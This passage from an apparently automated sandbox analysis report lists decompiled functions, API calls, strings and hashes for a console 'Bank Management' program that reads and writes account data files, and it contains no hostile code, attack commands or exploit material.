                                              • _wprintf.LIBCMT ref: 00D821D2
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D821EA
                                              • _wprintf.LIBCMT ref: 00D8221D
                                              • _wprintf.LIBCMT ref: 00D82235
                                              • _wprintf.LIBCMT ref: 00D8224B
                                              • _wprintf.LIBCMT ref: 00D82261
                                              • _wprintf.LIBCMT ref: 00D82277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID: BANK MANAGEMENT //$Designed and Programmed by:$Press Any key to continue...$Ravi Agrawal$Sagar Sharma$Sawal Maskey
                                              • API String ID: 1778593935-2888666035
                                              • Opcode ID: d1afb519cc5981c86416fe08bab6ad99f2282f1645cbff36a6b9115f071dbe3f
                                              • Instruction ID: e2c40c5e3c0951eb99115c09995d63bed5335a23b91826580866a6af99661def
                                              • Opcode Fuzzy Hash: d1afb519cc5981c86416fe08bab6ad99f2282f1645cbff36a6b9115f071dbe3f
                                              • Instruction Fuzzy Hash: E121C4B4FC4304FAEA50B7A45C07BAE2224DB50F68F240020F7457A1C2E9E1A65967BB
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82080, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00D82080(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				void* __ebp;
				void* _t9;
				intOrPtr _t16;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t31;
				void* _t37;

				_t37 = __fp0;
				_t23 = __esi;
				_t22 = __edi;
				E00D81320(__edi, __esi, __eflags, 0, 0, 0x50, 0x17);
				E00D81250(0x19, 1);
				_push("Banking Management //");
				E00D870FC(_t20, __edi, __esi, __eflags);
				E00D81250(5, 3);
				_t9 = E00D881D0(0xda2ee4, "Admin");
				_t26 = _t24 + 0xc;
				if(_t9 == 0) {
					 *0xda2240 = 1;
				}
				_t34 =  *0xda2240;
				if( *0xda2240 == 0) {
					_push(0xda2ee4);
					_push("Current User : %s");
					E00D870FC(_t20, _t22, _t23, __eflags);
					_t27 = _t26 + 8;
				} else {
					_push("Current User : Admin");
					E00D870FC(_t20, _t22, _t23, _t34);
					_t27 = _t26 + 4;
				}
				_push("\t\t\t\tDate : ");
				E00D870FC(_t20, _t22, _t23, _t34);
				E00D882EB(_t34, 0xda2f40);
				_push(0xda2f40);
				E00D81640(_t22, _t23, _t37);
				_push(0xda2f40);
				_push("%s");
				E00D870FC(_t20, _t22, _t23, _t34);
				E00D882EB(_t34, 0xda2f40);
				_t31 = _t27 + 0x14;
				_t16 = E00D81250(1, 5);
				_v8 = 0;
				while(1) {
					_t35 = _v8 - 0x4e;
					if(_v8 >= 0x4e) {
						break;
					}
					_push(0xc4);
					_push("%c");
					E00D870FC(_t20, _t22, _t23, _t35);
					_t31 = _t31 + 8;
					_t16 = _v8 + 1;
					_v8 = _t16;
				}
				return _t16;
			}













                                              0x00d82080
                                              0x00d82080
                                              0x00d82080
                                              0x00d8208c
                                              0x00d82095
                                              0x00d8209a
                                              0x00d8209f
                                              0x00d820ab
                                              0x00d820ba
                                              0x00d820bf
                                              0x00d820c4
                                              0x00d820c6
                                              0x00d820c6
                                              0x00d820d0
                                              0x00d820d7
                                              0x00d820e8
                                              0x00d820ed
                                              0x00d820f2
                                              0x00d820f7
                                              0x00d820d9
                                              0x00d820d9
                                              0x00d820de
                                              0x00d820e3
                                              0x00d820e3
                                              0x00d820fa
                                              0x00d820ff
                                              0x00d8210c
                                              0x00d82114
                                              0x00d82119
                                              0x00d8211e
                                              0x00d82123
                                              0x00d82128
                                              0x00d82135
                                              0x00d8213a
                                              0x00d82141
                                              0x00d82146
                                              0x00d82158
                                              0x00d82158
                                              0x00d8215c
                                              0x00000000
                                              0x00000000
                                              0x00d8215e
                                              0x00d82163
                                              0x00d82168
                                              0x00d8216d
                                              0x00d82152
                                              0x00d82155
                                              0x00d82155
                                              0x00d82175

                                              APIs
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D8209F
                                              • _wprintf.LIBCMT ref: 00D820DE
                                              • _wprintf.LIBCMT ref: 00D820F2
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D820FF
                                              • __wstrtime.LIBCMT ref: 00D8210C
                                              • _wprintf.LIBCMT ref: 00D82128
                                              • __wstrtime.LIBCMT ref: 00D82135
                                              • _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                              • String ID: Date : $Admin$Banking Management //$Current User : %s$Current User : Admin$N
                                              • API String ID: 3817360410-644830535
                                              • Opcode ID: d24c37e82d4df1544ed9e58115092b7701f6351b27fc458f1e63f8e201fed812
                                              • Instruction ID: dda950efef12e9e26d2faaf1e24c038399828123e091f87c7bac84d5367b7873
                                              • Opcode Fuzzy Hash: d24c37e82d4df1544ed9e58115092b7701f6351b27fc458f1e63f8e201fed812
                                              • Instruction Fuzzy Hash: 001148B0EC4304BEE11073A65C07FAE3564DB22F1AF240064FA49352C2E9E2A65C537F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D8A582, Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E00D8A582(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t81;
				void* _t86;
				long _t90;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int _t134;
				signed int _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t160;

				_push(0x64);
				_push(0xd9d8c0);
				E00D89100(__ebx, __edi, __esi);
				E00D8BDFF(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				_t160 =  *0xda2f60 - _t130; // 0x0
				if(_t160 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E00D8C4FB();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					__eflags = _t134;
					if(_t134 != 0) {
						 *0xda2f60 = _t81;
						 *0xda2f5c = _t141;
						while(1) {
							__eflags = _t134 - _t81 + 0x800;
							if(_t134 >= _t81 + 0x800) {
								break;
							}
							 *((short*)(_t134 + 4)) = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							 *(_t134 + 8) = _t130;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x00000080;
							 *(_t134 + 0x24) =  *(_t134 + 0x24) & 0x0000007f;
							 *((short*)(_t134 + 0x25)) = 0xa0a;
							 *(_t134 + 0x38) = _t130;
							 *(_t134 + 0x34) = _t130;
							_t134 = _t134 + 0x40;
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0xda2f60; // 0x0
						}
						GetStartupInfoW(_t155 - 0x74);
						__eflags =  *((short*)(_t155 - 0x42));
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								__eflags = _t130 - 3;
								if(_t130 >= 3) {
									break;
								}
								_t147 = (_t130 << 6) +  *0xda2f60;
								 *(_t155 - 0x24) = _t147;
								__eflags =  *_t147 - 0xffffffff;
								if( *_t147 == 0xffffffff) {
									L35:
									_t147[1] = 0x81;
									__eflags = _t130;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
										__eflags = _t90;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									__eflags = _t142 - 0xffffffff;
									if(_t142 == 0xffffffff) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0xda3064;
										__eflags = _t94;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										__eflags = _t142;
										if(_t142 == 0) {
											goto L47;
										}
										_t98 = GetFileType(_t142);
										__eflags = _t98;
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										__eflags = _t99 - 2;
										if(_t99 != 2) {
											__eflags = _t99 - 3;
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -14298964
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												L49:
												_t130 = _t130 + 1;
												continue;
											}
											_t103 = _t147[1] | 0x00000008;
											__eflags = _t103;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								}
								__eflags =  *_t147 - 0xfffffffe;
								if( *_t147 == 0xfffffffe) {
									goto L35;
								}
								_t147[1] = _t147[1] | 0x00000080;
								goto L49;
							}
							 *(_t155 - 4) = 0xfffffffe;
							E00D8A846();
							L2:
							_t86 = 1;
							L3:
							return E00D89145(_t86);
						}
						_t105 =  *(_t155 - 0x40);
						__eflags = _t105;
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *(_t155 - 0x1c) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						__eflags = _t135 - 0x800;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *(_t155 - 0x1c) = 0x800;
						}
						_t149 = 1;
						__eflags = 1;
						 *(_t155 - 0x30) = 1;
						while(1) {
							__eflags =  *0xda2f5c - _t135; // 0x3
							if(__eflags >= 0) {
								break;
							}
							_t138 = E00D8C4FB(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							__eflags = _t138;
							if(_t138 != 0) {
								0xda2f60[_t149] = _t138;
								 *0xda2f5c =  *0xda2f5c + _t141;
								__eflags =  *0xda2f5c;
								while(1) {
									__eflags = _t138 - 0xda2f60[_t149] + 0x800;
									if(_t138 >= 0xda2f60[_t149] + 0x800) {
										break;
									}
									 *((short*)(_t138 + 4)) = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									 *(_t138 + 8) = _t130;
									 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
									 *((short*)(_t138 + 0x25)) = 0xa0a;
									 *(_t138 + 0x38) = _t130;
									 *(_t138 + 0x34) = _t130;
									_t138 = _t138 + 0x40;
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *(_t155 - 0x1c);
								continue;
							}
							_t135 =  *0xda2f5c; // 0x3
							 *(_t155 - 0x1c) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(1) {
							__eflags = _t143 - _t135;
							if(_t143 >= _t135) {
								goto L31;
							}
							_t150 =  *_t139;
							__eflags = _t150 - 0xffffffff;
							if(_t150 == 0xffffffff) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							}
							__eflags = _t150 - 0xfffffffe;
							if(_t150 == 0xfffffffe) {
								goto L26;
							}
							_t111 =  *_t109;
							__eflags = _t111 & 0x00000001;
							if((_t111 & 0x00000001) == 0) {
								goto L26;
							}
							__eflags = _t111 & 0x00000008;
							if((_t111 & 0x00000008) != 0) {
								L24:
								_t154 = ((_t143 & 0x0000001f) << 6) + 0xda2f60[_t143 >> 5];
								 *(_t155 - 0x24) = _t154;
								 *_t154 =  *_t139;
								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
								_t38 = _t154 + 0xc; // 0xd
								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
								_t39 = _t154 + 8;
								 *_t39 =  *(_t154 + 8) + 1;
								__eflags =  *_t39;
								_t139 =  *(_t155 - 0x20);
								L25:
								_t135 =  *(_t155 - 0x1c);
								goto L26;
							}
							_t119 = GetFileType(_t150);
							_t139 =  *(_t155 - 0x20);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L25;
							}
							goto L24;
						}
						goto L31;
					}
					E00D89690(_t155, 0xda1380, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E00D89690(_t155, 0xda1380, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}





























                                              0x00d8a582
                                              0x00d8a584
                                              0x00d8a589
                                              0x00d8a590
                                              0x00d8a596
                                              0x00d8a598
                                              0x00d8a59b
                                              0x00d8a5a1
                                              0x00d8a5c1
                                              0x00d8a5c5
                                              0x00d8a5c6
                                              0x00d8a5c7
                                              0x00d8a5ce
                                              0x00d8a5d0
                                              0x00d8a5d3
                                              0x00d8a5d5
                                              0x00d8a5ee
                                              0x00d8a5f3
                                              0x00d8a5f9
                                              0x00d8a5fe
                                              0x00d8a600
                                              0x00000000
                                              0x00000000
                                              0x00d8a602
                                              0x00d8a608
                                              0x00d8a60b
                                              0x00d8a60e
                                              0x00d8a617
                                              0x00d8a61a
                                              0x00d8a620
                                              0x00d8a623
                                              0x00d8a626
                                              0x00d8a629
                                              0x00d8a62c
                                              0x00d8a62c
                                              0x00d8a637
                                              0x00d8a63d
                                              0x00d8a642
                                              0x00d8a771
                                              0x00d8a771
                                              0x00d8a771
                                              0x00d8a774
                                              0x00d8a777
                                              0x00000000
                                              0x00000000
                                              0x00d8a782
                                              0x00d8a788
                                              0x00d8a78b
                                              0x00d8a78e
                                              0x00d8a7a3
                                              0x00d8a7a3
                                              0x00d8a7a7
                                              0x00d8a7a9
                                              0x00d8a7b0
                                              0x00d8a7b5
                                              0x00d8a7b7
                                              0x00d8a7b7
                                              0x00d8a7ab
                                              0x00d8a7ad
                                              0x00d8a7ad
                                              0x00d8a7c1
                                              0x00d8a7c3
                                              0x00d8a7c6
                                              0x00d8a80d
                                              0x00d8a813
                                              0x00d8a816
                                              0x00d8a81c
                                              0x00d8a821
                                              0x00d8a823
                                              0x00d8a828
                                              0x00d8a828
                                              0x00000000
                                              0x00d8a7c8
                                              0x00d8a7c8
                                              0x00d8a7ca
                                              0x00000000
                                              0x00000000
                                              0x00d8a7cd
                                              0x00d8a7d3
                                              0x00d8a7d5
                                              0x00000000
                                              0x00000000
                                              0x00d8a7d7
                                              0x00d8a7d9
                                              0x00d8a7de
                                              0x00d8a7e1
                                              0x00d8a7eb
                                              0x00d8a7ee
                                              0x00d8a7f9
                                              0x00d8a7fe
                                              0x00d8a802
                                              0x00d8a808
                                              0x00d8a82f
                                              0x00d8a82f
                                              0x00000000
                                              0x00d8a82f
                                              0x00d8a7f4
                                              0x00d8a7f4
                                              0x00d8a7f6
                                              0x00d8a7f6
                                              0x00000000
                                              0x00d8a7f6
                                              0x00d8a7e7
                                              0x00000000
                                              0x00d8a7e7
                                              0x00d8a7c6
                                              0x00d8a790
                                              0x00d8a793
                                              0x00000000
                                              0x00000000
                                              0x00d8a79b
                                              0x00000000
                                              0x00d8a79b
                                              0x00d8a835
                                              0x00d8a83c
                                              0x00d8a5b6
                                              0x00d8a5b8
                                              0x00d8a5b9
                                              0x00d8a5be
                                              0x00d8a5be
                                              0x00d8a648
                                              0x00d8a64b
                                              0x00d8a64d
                                              0x00000000
                                              0x00000000
                                              0x00d8a653
                                              0x00d8a655
                                              0x00d8a658
                                              0x00d8a65b
                                              0x00d8a660
                                              0x00d8a668
                                              0x00d8a66a
                                              0x00d8a66c
                                              0x00d8a66e
                                              0x00d8a66e
                                              0x00d8a673
                                              0x00d8a673
                                              0x00d8a674
                                              0x00d8a677
                                              0x00d8a677
                                              0x00d8a67d
                                              0x00000000
                                              0x00000000
                                              0x00d8a689
                                              0x00d8a68b
                                              0x00d8a68e
                                              0x00d8a690
                                              0x00d8a724
                                              0x00d8a72b
                                              0x00d8a72b
                                              0x00d8a731
                                              0x00d8a73d
                                              0x00d8a73f
                                              0x00000000
                                              0x00000000
                                              0x00d8a741
                                              0x00d8a747
                                              0x00d8a74a
                                              0x00d8a74d
                                              0x00d8a751
                                              0x00d8a757
                                              0x00d8a75a
                                              0x00d8a75d
                                              0x00d8a760
                                              0x00d8a760
                                              0x00d8a765
                                              0x00d8a766
                                              0x00d8a769
                                              0x00000000
                                              0x00d8a769
                                              0x00d8a696
                                              0x00d8a69c
                                              0x00000000
                                              0x00d8a69c
                                              0x00d8a69f
                                              0x00d8a6a1
                                              0x00d8a6a4
                                              0x00d8a6a7
                                              0x00d8a6aa
                                              0x00d8a6aa
                                              0x00d8a6ac
                                              0x00000000
                                              0x00000000
                                              0x00d8a6b2
                                              0x00d8a6b4
                                              0x00d8a6b7
                                              0x00d8a711
                                              0x00d8a711
                                              0x00d8a712
                                              0x00d8a718
                                              0x00d8a719
                                              0x00d8a71c
                                              0x00d8a71f
                                              0x00000000
                                              0x00d8a71f
                                              0x00d8a6b9
                                              0x00d8a6bc
                                              0x00000000
                                              0x00000000
                                              0x00d8a6be
                                              0x00d8a6c0
                                              0x00d8a6c2
                                              0x00000000
                                              0x00000000
                                              0x00d8a6c4
                                              0x00d8a6c6
                                              0x00d8a6d6
                                              0x00d8a6e3
                                              0x00d8a6ea
                                              0x00d8a6ef
                                              0x00d8a6f6
                                              0x00d8a6fe
                                              0x00d8a702
                                              0x00d8a708
                                              0x00d8a708
                                              0x00d8a708
                                              0x00d8a70b
                                              0x00d8a70e
                                              0x00d8a70e
                                              0x00000000
                                              0x00d8a70e
                                              0x00d8a6c9
                                              0x00d8a6cf
                                              0x00d8a6d2
                                              0x00d8a6d4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d8a6d4
                                              0x00000000
                                              0x00d8a6aa
                                              0x00d8a5e2
                                              0x00d8a5ea
                                              0x00000000
                                              0x00d8a5ea
                                              0x00d8a5ae
                                              0x00000000

                                              APIs
                                              • __lock.LIBCMT ref: 00D8A590
                                                • Part of subcall function 00D8BDFF: __mtinitlocknum.LIBCMT ref: 00D8BE11
                                                • Part of subcall function 00D8BDFF: EnterCriticalSection.KERNEL32(?,?,00D8D608,0000000D,?,?,?,?,00D9DA28,00000008,00D8D5A1,00000000,00000000,00D88EA4,00D91DF6,00000000), ref: 00D8BE2A
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D8A5AE
                                              • __calloc_crt.LIBCMT ref: 00D8A5C7
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D8A5E2
                                              • GetStartupInfoW.KERNEL32(?,00D9D8C0,00000064), ref: 00D8A637
                                              • __calloc_crt.LIBCMT ref: 00D8A682
                                              • GetFileType.KERNEL32(00000001), ref: 00D8A6C9
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D8A702
                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00D8A7BB
                                              • GetFileType.KERNEL32(00000000), ref: 00D8A7CD
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(-00DA2F54,00000FA0), ref: 00D8A802
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 1456538442-0
                                              • Opcode ID: d2d2215264139ca6a3d1d5b54afd3937d47f88dfe84cb7d7be63eceb717c4cc9
                                              • Instruction ID: b1451b256f8cb52ae2cecd6c0562c5be7a6524d9222bc39a873079a60e86dd14
                                              • Opcode Fuzzy Hash: d2d2215264139ca6a3d1d5b54afd3937d47f88dfe84cb7d7be63eceb717c4cc9
                                              • Instruction Fuzzy Hash: E191BE719047458FEB14EF6DC8415A9BBB0EF06320B28426FD4A6EB3A1D7349843DB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D88DC3, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00D88DC3(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E00D8A547(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E00D900D2(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0xda2f60; // 0x0
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E00D900D2(2);
							if(E00D900D2(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E00D900D2(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E00D9004C(_t35);
					 *((char*)( *((intOrPtr*)(0xda2f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E00D88E7E(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                              0x00d88dc6
                                              0x00d88dcd
                                              0x00d88dd6
                                              0x00d88de3
                                              0x00d88e35
                                              0x00d88e35
                                              0x00d88de5
                                              0x00d88de5
                                              0x00d88ded
                                              0x00d88dfb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00d88e03
                                              0x00d88e03
                                              0x00d88e05
                                              0x00d88e17
                                              0x00000000
                                              0x00d88e19
                                              0x00d88e19
                                              0x00d88e29
                                              0x00000000
                                              0x00d88e2b
                                              0x00d88e31
                                              0x00d88e31
                                              0x00d88e29
                                              0x00d88e17
                                              0x00d88ded
                                              0x00d88e38
                                              0x00d88e50
                                              0x00d88e57
                                              0x00d88e65
                                              0x00d88e59
                                              0x00d88e60
                                              0x00d88e60
                                              0x00d88e6a
                                              0x00d88dcf
                                              0x00d88dd3
                                              0x00d88dd3

                                              APIs
                                              • __ioinit.LIBCMT ref: 00D88DC6
                                                • Part of subcall function 00D8A547: InitOnceExecuteOnce.KERNEL32(00DA229C,00D8A582,00000000,00000000,00D911A5,?,?,00D89826,00000000,?,?,?,00D8714D,-00000020,00D9D7B8,0000000C), ref: 00D8A555
                                              • __get_osfhandle.LIBCMT ref: 00D88DDA
                                              • __get_osfhandle.LIBCMT ref: 00D88E05
                                              • __get_osfhandle.LIBCMT ref: 00D88E0E
                                              • __get_osfhandle.LIBCMT ref: 00D88E1A
                                              • CloseHandle.KERNEL32(00000000,00D825F6,00000000,?,00D9414B,00D825F6,?,?,?,?,?,?,?,00D825F6,00000000,00000109), ref: 00D88E21
                                              • GetLastError.KERNEL32(?,00D9414B,00D825F6,?,?,?,?,?,?,?,00D825F6,00000000,00000109), ref: 00D88E2B
                                              • __free_osfhnd.LIBCMT ref: 00D88E38
                                              • __dosmaperr.LIBCMT ref: 00D88E5A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                              • String ID:
                                              • API String ID: 974577687-0
                                              • Opcode ID: bfca4ce97d2cad367b4331a9ae938a6b66e17502ccd90a14dc7b475265e7a26d
                                              • Instruction ID: bfb185fb32f5f7585bdcfd41b46f6d9b3f72c2149a9804043b4608352689b37e
                                              • Opcode Fuzzy Hash: bfca4ce97d2cad367b4331a9ae938a6b66e17502ccd90a14dc7b475265e7a26d
                                              • Instruction Fuzzy Hash: 671125326002541ED6223239A84973F3A489F52B74FA90359F81DCB2D2EE22CC41A3B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D83A50, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 203COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _swscanf.LIBCMT ref: 00D83AE8
                                                • Part of subcall function 00D86FC1: _vfscanf.LIBCMT ref: 00D86FD5
                                              • _fprintf.LIBCMT ref: 00D83D46
                                              Strings
                                              • TEMP.DAT, xrefs: 00D83A82
                                              • ACCOUNT.DAT, xrefs: 00D83A5E
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D83D3A
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D83ADD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.341239813.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000000.00000002.341218726.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341301778.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341314232.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341338176.0000000000DA1000.00000004.00020000.sdmp Download File
                                              • Associated: 00000000.00000002.341351840.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: __fsopen_fprintf_swscanf_vfscanf
                                              • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                              • API String ID: 1563022539-2055742014
                                              • Opcode ID: d8fc85008701909834cd05bc99fb34df7ea912c9741b92904899df6eddfa8807
                                              • Instruction ID: b0c3b2ba049aff2323b43c2ffd5a2525d821c0598d2f44ca2d45d7d62335d67b
                                              • Opcode Fuzzy Hash: d8fc85008701909834cd05bc99fb34df7ea912c9741b92904899df6eddfa8807
                                              • Instruction Fuzzy Hash: 6E91F872C106599ECB09DFA9D991BFDFB79EF46300F04826EE006BA191E6745684CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D81320, Relevance: 10.6, APIs: 7, Instructions: 126COMMON
